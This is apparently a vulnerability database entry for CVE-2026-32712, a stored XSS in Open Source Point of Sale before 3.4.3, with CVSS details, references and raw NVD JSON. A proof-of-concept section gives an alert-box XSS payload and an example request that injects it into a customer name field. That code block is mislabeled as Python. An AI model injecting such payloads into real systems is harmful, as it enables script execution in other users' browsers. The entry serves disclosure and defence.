CVE-2026-32712

Description

Open Source Point of Sale is a web based point-of-sale application written in PHP using CodeIgniter framework. Prior to 3.4.3, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Daily Sales management table. The customer_name column is configured with escape: false in the bootstrap-table column configuration, causing customer names to be rendered as raw HTML. An attacker with customer management permissions can inject arbitrary JavaScript into a customer's first_name or last_name field, which executes in the browser of any user viewing the Daily Sales page. This vulnerability is fixed in 3.4.3.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:opensourcepos:open_source_point_of_sale:*:*:*:*:*:*:*:* - VULNERABLE

Open Source Point of Sale < 3.4.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Payload to be injected into the customer name field (e.g., first_name or last_name) // This payload displays an alert box to confirm vulnerability execution var xssPayload = '<img src=x onerror=alert(\'CVE-2026-32712\')>'; /* Example HTTP Request to exploit the vulnerability: POST /index.php/customers/save/1 HTTP/1.1 Host: target.example.com Content-Type: application/x-www-form-urlencoded Cookie: [Attacker's Session Cookie] first_name=<img src=x onerror=alert('CVE-2026-32712')>&last_name=Doe&[email protected]&... */

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32712
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32712
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32712/
[4] VulDB https://vuldb.com/cve/CVE-2026-32712
[5] https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-hcfr-9hfv-mcwp

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32712", "sourceIdentifier": "[email protected]", "published": "2026-04-07T21:17:16.430", "lastModified": "2026-04-14T18:45:18.430", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open Source Point of Sale is a web based point-of-sale application written in PHP using CodeIgniter framework. Prior to 3.4.3, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Daily Sales management table. The customer_name column is configured with escape: false in the bootstrap-table column configuration, causing customer names to be rendered as raw HTML. An attacker with customer management permissions can inject arbitrary JavaScript into a customer's first_name or last_name field, which executes in the browser of any user viewing the Daily Sales page. This vulnerability is fixed in 3.4.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensourcepos:open_source_point_of_sale:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.4.3", "matchCriteriaId": "33CA1AD1-86E9-4A57-8D1D-48AC5FEA0AE8"}]}]}], "references": [{"url": "https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-hcfr-9hfv-mcwp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}